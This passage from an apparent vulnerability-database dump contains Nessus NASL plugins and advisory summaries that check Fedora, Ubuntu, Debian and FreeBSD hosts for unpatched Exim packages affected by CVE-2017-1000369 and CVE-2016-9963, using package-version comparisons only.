script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/01\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"exim-4.89-5.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:56:49", "description": "It was discovered that Exim did not properly deallocate memory when processing certain command line arguments. 
A local attacker could use this in conjunction with another vulnerability to possibly execute arbitrary code and gain administrative privileges.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-06-20T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS / 16.04 LTS : Exim vulnerability (USN-3322-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000369"], "modified": "2023-10-20T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-heavy", "p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-light", "p-cpe:/a:canonical:ubuntu_linux:exim4-dev", "p-cpe:/a:canonical:ubuntu_linux:eximon4", "cpe:/o:canonical:ubuntu_linux:14.04:-:lts", "cpe:/o:canonical:ubuntu_linux:16.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:exim4", "p-cpe:/a:canonical:ubuntu_linux:exim4-base", "p-cpe:/a:canonical:ubuntu_linux:exim4-config"], "id": "UBUNTU_USN-3322-1.NASL", "href": "https://www.tenable.com/plugins/nessus/100920", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3322-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100920);\n script_version(\"3.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/20\");\n\n script_cve_id(\"CVE-2017-1000369\");\n script_xref(name:\"USN\", value:\"3322-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS : Exim vulnerability (USN-3322-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"It was discovered that Exim did not properly deallocate memory when\nprocessing certain command line arguments. A local attacker could use\nthis in conjunction with another vulnerability to possibly execute\narbitrary code and gain administrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-3322-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-1000369\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", 
value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-heavy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-light\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:eximon4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-config\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2023 Canonical, Inc. / NASL script (C) 2017-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/Ubuntu/release');\nif ( isnull(os_release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nos_release = chomp(os_release);\nif (! 
('14.04' >< os_release || '16.04' >< os_release)) audit(AUDIT_OS_NOT, 'Ubuntu 14.04 / 16.04', 'Ubuntu ' + os_release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar pkgs = [\n {'osver': '14.04', 'pkgname': 'exim4', 'pkgver': '4.82-3ubuntu2.3'},\n {'osver': '14.04', 'pkgname': 'exim4-base', 'pkgver': '4.82-3ubuntu2.3'},\n {'osver': '14.04', 'pkgname': 'exim4-config', 'pkgver': '4.82-3ubuntu2.3'},\n {'osver': '14.04', 'pkgname': 'exim4-daemon-heavy', 'pkgver': '4.82-3ubuntu2.3'},\n {'osver': '14.04', 'pkgname': 'exim4-daemon-light', 'pkgver': '4.82-3ubuntu2.3'},\n {'osver': '14.04', 'pkgname': 'exim4-dev', 'pkgver': '4.82-3ubuntu2.3'},\n {'osver': '14.04', 'pkgname': 'eximon4', 'pkgver': '4.82-3ubuntu2.3'},\n {'osver': '16.04', 'pkgname': 'exim4', 'pkgver': '4.86.2-2ubuntu2.2'},\n {'osver': '16.04', 'pkgname': 'exim4-base', 'pkgver': '4.86.2-2ubuntu2.2'},\n {'osver': '16.04', 'pkgname': 'exim4-config', 'pkgver': '4.86.2-2ubuntu2.2'},\n {'osver': '16.04', 'pkgname': 'exim4-daemon-heavy', 'pkgver': '4.86.2-2ubuntu2.2'},\n {'osver': '16.04', 'pkgname': 'exim4-daemon-light', 'pkgver': '4.86.2-2ubuntu2.2'},\n {'osver': '16.04', 'pkgname': 'exim4-dev', 'pkgver': '4.86.2-2ubuntu2.2'},\n {'osver': '16.04', 'pkgname': 'eximon4', 'pkgver': '4.86.2-2ubuntu2.2'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var osver = NULL;\n var pkgname = NULL;\n var pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) 
flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'exim4 / exim4-base / exim4-config / exim4-daemon-heavy / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:56:40", "description": "Exim supports the use of multiple '-p' command line arguments which are malloc()'ed and never free()'ed, used in conjunction with other issues allows attackers to cause arbitrary code execution.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 4.80-7+deb7u5.\n\nWe recommend that you upgrade your exim4 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-06-26T00:00:00", "type": "nessus", "title": "Debian DLA-1001-1 : exim4 security update (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000369"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:exim4", "p-cpe:/a:debian:debian_linux:exim4-base", "p-cpe:/a:debian:debian_linux:exim4-config", "p-cpe:/a:debian:debian_linux:exim4-daemon-heavy", "p-cpe:/a:debian:debian_linux:exim4-daemon-heavy-dbg", "p-cpe:/a:debian:debian_linux:exim4-daemon-light", "p-cpe:/a:debian:debian_linux:exim4-daemon-light-dbg", "p-cpe:/a:debian:debian_linux:exim4-dbg", "p-cpe:/a:debian:debian_linux:exim4-dev", "p-cpe:/a:debian:debian_linux:eximon4", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-1001.NASL", "href": "https://www.tenable.com/plugins/nessus/101032", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this 
plugin were\n# extracted from Debian Security Advisory DLA-1001-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101032);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-1000369\");\n\n script_name(english:\"Debian DLA-1001-1 : exim4 security update (Stack Clash)\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Exim supports the use of multiple '-p' command line arguments which\nare malloc()'ed and never free()'ed, used in conjunction with other\nissues allows attackers to cause arbitrary code execution.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n4.80-7+deb7u5.\n\nWe recommend that you upgrade your exim4 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/06/msg00030.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/exim4\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-config\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-daemon-heavy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-daemon-heavy-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-daemon-light\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-daemon-light-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:eximon4\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/24\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"exim4\", reference:\"4.80-7+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-base\", reference:\"4.80-7+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-config\", reference:\"4.80-7+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-daemon-heavy\", reference:\"4.80-7+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-daemon-heavy-dbg\", reference:\"4.80-7+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-daemon-light\", reference:\"4.80-7+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-daemon-light-dbg\", reference:\"4.80-7+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-dbg\", reference:\"4.80-7+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-dev\", reference:\"4.80-7+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"eximon4\", 
reference:\"4.80-7+deb7u5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:deb_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:57:34", "description": "The Exim project reports :\n\nExim leaks the private DKIM signing key to the log files.\nAdditionally, if the build option EXPERIMENTAL_DSN_INFO=yes is used, the key material is included in the bounce message.", "cvss3": {}, "published": "2016-12-27T00:00:00", "type": "nessus", "title": "FreeBSD : exim -- DKIM private key leak (e7002b26-caaa-11e6-a76a-9f7324e5534e)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9963"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:exim", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_E7002B26CAAA11E6A76A9F7324E5534E.NASL", "href": "https://www.tenable.com/plugins/nessus/96122", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96122);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-9963\");\n\n script_name(english:\"FreeBSD : exim -- DKIM private key leak (e7002b26-caaa-11e6-a76a-9f7324e5534e)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Exim project reports :\n\nExim leaks the private DKIM signing key to the log files.\nAdditionally, if the build option EXPERIMENTAL_DSN_INFO=yes is used,\nthe key material is included in the bounce message.\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://exim.org/static/doc/CVE-2016-9963.txt\"\n );\n # https://vuxml.freebsd.org/freebsd/e7002b26-caaa-11e6-a76a-9f7324e5534e.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?02b7365f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"exim>4.69<4.87.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:pkg_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-05T14:56:41", "description": "Qualys reports :\n\nExim supports the use of multiple '-p' command line arguments which are malloc()'ed and never free()'ed, used in conjunction with other issues allows attackers to cause arbitrary code execution. This affects exim version 4.89 and earlier. 
Please note that at this time upstream has released a patch (commit 65e061b76867a9ea7aeeb535341b790b90ae6c21), but it is not known if a new point release is available that addresses this issue at this time.", "cvss3": {}, "published": "2017-06-22T00:00:00", "type": "nessus", "title": "FreeBSD : exim -- Privilege escalation via multiple memory leaks (8c1a271d-56cf-11e7-b9fe-c13eb7bcbf4f) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000369"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:exim", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_8C1A271D56CF11E7B9FEC13EB7BCBF4F.NASL", "href": "https://www.tenable.com/plugins/nessus/100975", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100975);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-1000369\");\n\n script_name(english:\"FreeBSD : exim -- Privilege escalation via multiple memory leaks (8c1a271d-56cf-11e7-b9fe-c13eb7bcbf4f) (Stack Clash)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Qualsys reports :\n\nExim supports the use of multiple '-p' command line arguments which\nare malloc()'ed and never free()'ed, used in conjunction with other\nissues allows attackers to cause arbitrary code execution. This\naffects exim version 4.89 and earlier. 
Please note that at this time\nupstream has released a patch (commit\n65e061b76867a9ea7aeeb535341b790b90ae6c21), but it is not known if a\nnew point release is available that addresses this issue at this time.\"\n );\n # https://vuxml.freebsd.org/freebsd/8c1a271d-56cf-11e7-b9fe-c13eb7bcbf4f.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?50326249\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/22\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"exim<4.89_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:pkg_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:00:57", "description": "The remote host is affected by the vulnerability described in GLSA-201709-19 (Exim: Local privilege escalation)\n\n Exim supports the use of multiple “-p” command line arguments 